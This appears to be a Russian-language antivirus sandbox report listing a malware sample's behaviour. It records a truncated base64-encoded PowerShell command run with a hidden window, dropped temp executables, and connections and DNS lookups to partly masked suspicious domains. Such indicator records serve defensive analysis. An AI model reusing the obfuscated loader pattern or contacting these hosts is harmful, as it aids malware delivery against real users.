Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABVAEgAUgBJAEgAcQBxAGsAPQAnAEcATgBLAFMASgBqAGcAYgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGAARQBjAFUAYABSAGkAYABUAFkAcAByAG8AYABUAG8AQwBPAGwAIgAgAD...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1568
- %TEMP%\1190272.cvr
- %TEMP%\qkaz.exe
- %TEMP%\qkaz.exe
- 'co##ta.com':80
- 'fo###all411.net':80
- 'fo###all411.net':443
- http://co##ta.com/404-page/
- DNS ASK me###nline.com
- DNS ASK xu###shuai.xyz
- DNS ASK co##ta.com
- DNS ASK of####.#orussolution.com
- DNS ASK fo###all411.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABVAEgAUgBJAEgAcQBxAGsAPQAnAEcATgBLAFMASgBqAGcAYgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGAARQBjAFUAYABSAGkAYABUAFkAcAByAG8AYABUAG8AQwBPAGwAIgAgAD...' (со скрытым окном)